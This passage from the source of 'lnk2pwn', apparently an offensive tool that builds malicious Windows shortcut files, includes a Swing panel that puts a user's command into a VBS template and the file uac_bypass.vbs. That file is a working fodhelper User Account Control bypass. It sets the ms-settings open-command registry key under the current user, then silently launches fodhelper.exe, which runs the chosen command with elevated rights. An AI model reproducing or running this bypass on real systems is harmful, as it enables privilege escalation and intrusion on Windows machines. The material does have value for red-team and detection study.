command = command.replace(System.lineSeparator(), "");
String output = String.format(vbsSourceCode, command);
uacOuputTextArea.setText(output);
}
private WebPanel createUACFileNamePanel() {
MigLayout layout = new MigLayout("", "[grow]", "");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(new WebLabel("File Name(.vbs)"), "wrap");
panel.add(uacFileNameField, "grow");
return panel;
}
private WebPanel createUACCommandPanel() {
MigLayout layout = new MigLayout("", "[grow][grow]", "[][grow]");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(new WebLabel("Command"));
panel.add(new WebLabel("Output"), "wrap");
uacCommandTextArea.setLineWrap(true);
uacCommandTextArea.setBackground(COMMAND_BG_COLOR);
uacCommandTextArea.setForeground(Color.WHITE);
uacOuputTextArea.setLineWrap(true);
uacOuputTextArea.setBackground(COMMAND_BG_COLOR);
uacOuputTextArea.setForeground(Color.WHITE);
WebScrollPane uacCommandAreaScroll = new WebScrollPane(uacCommandTextArea);
WebScrollPane uacOuputAreaScroll = new WebScrollPane(uacOuputTextArea);
panel.add(uacCommandAreaScroll, "w 100%, h 100%, hmin 250");
panel.add(uacOuputAreaScroll, "w 100%, h 100%, hmin 250");
return panel;
}
@Override
public void changedUpdate(DocumentEvent e) {
updateModel();
}
@Override
public void insertUpdate(DocumentEvent e) {
updateModel();
}
@Override
public void removeUpdate(DocumentEvent e) {
updateModel();
}
private void updateModel() {
shortcut.setCommand(uacCommandTextArea.getText().trim());
shortcut.setCommandOuput(uacOuputTextArea.getText().trim());
shortcut.setVbsFileName(uacFileNameField.getText().trim());
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/utils/ColorUtils.java
================================================
package com.itgorillaz.lnk2pwn.view.utils;
import java.awt.Color;
public class ColorUtils {
public static Color hex2Rgb(String hex) {
return new Color(
Integer.valueOf( hex.substring( 1, 3 ), 16 ),
Integer.valueOf( hex.substring( 3, 5 ), 16 ),
Integer.valueOf( hex.substring( 5, 7 ), 16 ) );
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/utils/IconFactory.java
================================================
package com.itgorillaz.lnk2pwn.view.utils;
import java.net.URL;
import javax.swing.ImageIcon;
public class IconFactory {
private static final String ICON_PATH = "icons/";
public static ImageIcon getIcon(String name) {
ClassLoader loader = IconFactory.class.getClassLoader();
URL url = loader.getResource(ICON_PATH + name);
return new ImageIcon(url);
}
}
================================================
FILE: src/main/resources/log4j.properties
================================================
# Root logger option
log4j.rootLogger=INFO, stdout
# Direct log messages to stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.Target=System.out
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.layout.ConversionPattern=%d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n
================================================
FILE: src/main/resources/vbs/uac_bypass.vbs
================================================
Const HKEY_CURRENT_USER = &H80000001
Const FodHelperPath = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName = ""
Const DefaultRegKeyValue = "%s"
Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)
Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue
Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False
================================================
FILE: src/test/java/com/itgorillaz/lnk2pwn/AppTest.java
================================================
package com.itgorillaz.lnk2pwn;
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
/**
* Unit test for simple App.
*/
public class AppTest
extends TestCase
{
/**
* Create the test case
*
* @param testName name of the test case
*/
public AppTest( String testName )
{
super( testName );
}
/**
* @return the suite of tests being tested
*/
public static Test suite()
{
return new TestSuite( AppTest.class );
}
/**
* Rigourous Test :-)
*/
public void testApp()
{
assertTrue( true );
}
}